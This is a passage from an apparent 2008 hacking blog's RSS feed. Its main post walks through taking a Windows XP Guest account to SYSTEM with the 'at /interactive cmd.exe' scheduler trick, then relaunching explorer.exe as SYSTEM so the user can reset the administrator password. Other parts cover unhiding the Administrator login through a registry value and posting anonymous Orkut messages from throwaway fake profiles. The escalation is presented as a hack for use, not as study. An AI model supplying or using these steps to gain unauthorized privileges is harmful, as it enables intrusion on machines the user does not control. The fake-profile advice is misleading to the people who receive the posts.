[ENTER]). &lt;/b&gt;&lt;br /&gt;&lt;b&gt;At the prompt, enter the following command, then press [ENTER]: &lt;/b&gt;&lt;br /&gt;&lt;h3 align=&quot;center&quot;&gt;  Code:&lt;/h3&gt;  &lt;h3 align=&quot;center&quot;&gt;  at&lt;/h3&gt;&lt;br /&gt;&lt;b&gt;If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]: &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3 align=&quot;center&quot;&gt;  Code:&lt;/h3&gt;  &lt;h3 align=&quot;center&quot;&gt;  at 15:25 /interactive “cmd.exe”&lt;/h3&gt;&lt;br /&gt;&lt;b&gt;Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this: &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this: &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there. &lt;/b&gt;&lt;br /&gt;&lt;b&gt;At the system command prompt, enter in the following: &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;  &lt;h3 align=&quot;center&quot;&gt;  Code:&lt;/h3&gt;  &lt;h3 align=&quot;center&quot;&gt;  explorer.exe&lt;/h3&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom): &lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;System user name on start menu&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;explorer.exe running under SYSTEM&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;What to do now &lt;/b&gt;&lt;br /&gt;&lt;b&gt;Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;  &lt;h3&gt;  &lt;i&gt;&lt;b&gt;ADMINISTRATOR IN WELCOME SCREEN.&lt;/b&gt;&lt;/i&gt;&lt;/h3&gt;&lt;b&gt; &lt;br /&gt;&lt;br /&gt;When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the &quot;Welcome Screen&quot; does not give you the option to log on as Administrator unless you boot up in Safe Mode.&lt;br /&gt;First you must ensure that the Administrator Account is enabled:&lt;br /&gt;1 open Control Panel&lt;br /&gt;2 open Administrative Tools&lt;br /&gt;3 open Local Security Policy&lt;br /&gt;4 expand Local Policies&lt;br /&gt;5 click on Security Options&lt;br /&gt;6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the &quot;Win2000 Logon Screen Tweak&quot; ie.&lt;br /&gt;1 open Control Panel&lt;br /&gt;2 open User Accounts&lt;br /&gt;3 click Change the way users log on or log off&lt;br /&gt;4 untick Use the Welcome Screen&lt;br /&gt;5 click Apply Options&lt;br /&gt;You will now be able to log on to Windows XP as Administrator in Normal Mode.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;  &lt;h3&gt;  &lt;i&gt;&lt;b&gt;EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!&lt;/b&gt;&lt;/i&gt;&lt;/h3&gt;&lt;b&gt; &lt;br /&gt;&lt;br /&gt;Start the Registry Editor Go to:&lt;br /&gt;HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \&lt;br /&gt;Right-click an empty space in the right pane and select New &gt; DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it&#39;s Value data. Close the registry editor and restart.&lt;br /&gt;&lt;br /&gt;                            Enjoy&lt;br /&gt;&lt;/b&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/02/hack-admin-from-xp-guest-account.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4830192571203385049.post-5077136255750960397</guid><pubDate>Sat, 16 Feb 2008 11:02:00 +0000</pubDate><atom:updated>2008-02-20T09:58:23.580-08:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Orkut Hacking (Orkutting)</category><title>WRITE ANONYMOUS SCRAPS .... (Orkutting)</title><description>&lt;p align=&quot;center&quot;&gt;                &lt;b&gt;WRITE ANONYMOUS                 SCRAPS&lt;br /&gt;                &lt;/b&gt;&lt;/p&gt;                The scraps or                 messages posted or                 the testimonials                 will not show the                 author&#39;s name,                 profile or any link                 to profile.&lt;p&gt;&lt;span class=&quot;font1&quot;&gt;Follow the steps:&lt;br /&gt;    &lt;/span&gt;&lt;/p&gt; &lt;span class=&quot;font1&quot;&gt;               &lt;/span&gt;&lt;p&gt;&lt;span class=&quot;font1&quot;&gt;&lt;b&gt;1) &lt;/b&gt;Create                 a fake (new)                 profile.&lt;/span&gt;&lt;/p&gt; &lt;span class=&quot;font1&quot;&gt;   &lt;/span&gt;&lt;p&gt;&lt;span class=&quot;font1&quot;&gt;&lt;b&gt;2)&lt;/b&gt; Send the scraps, posts or the testimonials you wish to     become anonymous.&lt;/span&gt;&lt;/p&gt; &lt;span class=&quot;font1&quot;&gt;   &lt;/span&gt;&lt;p&gt;&lt;span class=&quot;font1&quot;&gt;&lt;b&gt;3)&lt;/b&gt; Delete the just created fake account. All the posted     material will become anonymous automatically.&lt;/span&gt;&lt;/p&gt; &lt;span class=&quot;font1&quot;&gt;               &lt;/span&gt;&lt;p&gt;&lt;span class=&quot;font1&quot;&gt;&lt;b&gt;NOTE: IT MAY                 TAKE UPTO 24 HOURS                 FOR THE POSTED                 MATERIAL TO BECOME                 ANONYMOUS.&lt;/b&gt;&lt;/span&gt;&lt;/p&gt; &lt;span class=&quot;font1&quot;&gt;   &lt;/span&gt;&lt;p&gt;&lt;span class=&quot;font1&quot;&gt;That&#39;s all.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span class=&quot;font1&quot;&gt;Blackcoder&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;</description><link>http://blackcoder-hiren.blogspot.com/2008/02/write-anonymous-scraps-orkutting.html</link><author>noreply@blogger.com (Hiren)</author><thr:total>0</thr:total></item></channel></rss>